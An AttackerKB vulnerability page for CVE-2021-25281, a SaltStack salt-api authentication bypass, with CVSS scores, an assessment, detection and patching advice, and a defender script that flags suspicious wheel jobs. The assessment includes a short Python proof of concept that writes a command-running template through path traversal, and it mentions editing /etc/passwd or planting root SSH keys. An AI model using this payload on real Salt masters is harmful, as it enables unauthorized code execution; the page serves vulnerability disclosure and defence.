AttackerKB AKB:245CA8F9-A32E-455B-B7C9-E1CD95710F9D
History: Feb 27, 2021 - 12:00 a.m.

CVE-2021-25281

2021-02-27 00:00:00
attackerkb.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

An issue was discovered in SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.

Recent assessments:

kevthehermit at February 26, 2021 5:08pm UTC reported:

Vulnerability

<https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/>

This vulnerability is an Auth bypass in the SaltStack API, specifically, when making requests to the wheel_async client no checks are made to verify the requester is authenticated.

Salt stack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component that may limit the attack surface for organisations.

Exploiting

This is fairly trivial to exploit in order to run jobs against the salt master; however, there are some limitations in what actions you can perform. There is no cmd execution function.

A very simple example:

import requests

# Unauthenticated call to the salt-api /run endpoint using the wheel_async
# client; 'eauth' is supplied but no credentials are checked for this client.
response = requests.post(
    'https://127.0.0.1:8000/run',
    verify=False,
    json={
        'eauth': 'auto',
        'client': 'wheel_async',
        'fun': 'pillar_roots.write',
        'data': '{{ salt["cmd.run"]("id > /tmp/whoami")  }}',
        'path': '../../../../../../srv/salt/pwn.sls',
    },
)
# An async wheel call returns a job id (JID) once the job has been queued.
if json := response.json():
    print(f'Got JID: {json["return"][0]["jid"]}, the task was queued successfully')

You can edit the salt master configuration variables, which include the ability to set the auth_mode and sharedsecrets. If the API is restarted, your changes take effect, at which point you gain the ability to execute code against the master.

You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. In the default installation on Ubuntu the API runs as root, so you can use actions like editing /etc/passwd or writing SSH keys to /root/.ssh/id_rsa.

POC available at <https://github.com/Immersive-Labs-Sec/CVE-2021-25281>

Detection

The API typically runs on HTTPS, so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async functionality, every request to the instance will create a salt job. Salt stores the input and output of every job on disk, so it can be easy to review post-compromise activity.

More details can be found in this article: <https://www.immersivelabs.com/resources/blog/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>

Patching

Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.
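A defender-side triage of job records along the lines of the Detection note in the assessment above. This is an added example, not the assessor's code or Salt's own: it assumes the per-job records from the master's job cache have already been decoded into dicts with 'jid', 'fun', 'user' and 'kwarg' keys and that wheel jobs carry a 'wheel.' prefix on 'fun'; the sample records and the set of sensitive wheel functions are constructed for the example.

```python
"""Flag wheel jobs in Salt job-cache records that match the CVE-2021-25281
abuse pattern: wheel_async calls that write to pillar/file roots or edit the
master config, use '..' traversal in 'path', or carry no authenticated user.
Record layout is an assumption of this example (records are taken here as
dicts; on a real master they would be decoded from the job cache first)."""
from typing import Iterable, List

# Wheel functions whose effect the assessment describes (roots writes and
# config changes such as auth_mode / sharedsecret). Assumed names.
SENSITIVE_WHEEL_FUNS = {
    "wheel.pillar_roots.write",
    "wheel.file_roots.write",
    "wheel.config.update",
    "wheel.config.apply",
}


def suspicious_wheel_jobs(records: Iterable[dict]) -> List[dict]:
    """Return one finding per wheel job with at least one risk reason."""
    findings = []
    for rec in records:
        fun = rec.get("fun", "")
        if not fun.startswith("wheel."):
            continue  # minion/runner jobs are out of scope for this bug
        reasons = []
        if fun in SENSITIVE_WHEEL_FUNS:
            reasons.append("sensitive wheel function")
        path = str(rec.get("kwarg", {}).get("path", ""))
        if ".." in path.split("/"):
            reasons.append("path traversal in 'path'")
        if rec.get("user", "UNKNOWN") in ("", "UNKNOWN"):
            reasons.append("no authenticated user recorded")
        if reasons:
            findings.append({"jid": rec.get("jid"), "fun": fun, "reasons": reasons})
    return findings


# Constructed sample records (not from any real master).
SAMPLE_JOBS = [
    {"jid": "20210226170801000001", "fun": "wheel.key.list_all",
     "user": "saltadmin", "kwarg": {}},
    {"jid": "20210226170802000002", "fun": "wheel.pillar_roots.write",
     "user": "UNKNOWN",
     "kwarg": {"data": "...", "path": "../../../../../../srv/salt/pwn.sls"}},
    {"jid": "20210226170803000003", "fun": "wheel.config.update",
     "user": "UNKNOWN", "kwarg": {"auth_mode": 1}},
    {"jid": "20210226170804000004", "fun": "runner.jobs.list_jobs",
     "user": "saltadmin", "kwarg": {}},
]
```

Run the function over decoded records from the job cache and review the flagged JIDs together with their stored job output.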

cdelafuente-r7 at April 09, 2021 4:04pm UTC reported:


Assessed Attacker Value: 4
Assessed Attacker Value: 4
Assessed Attacker Value: 5
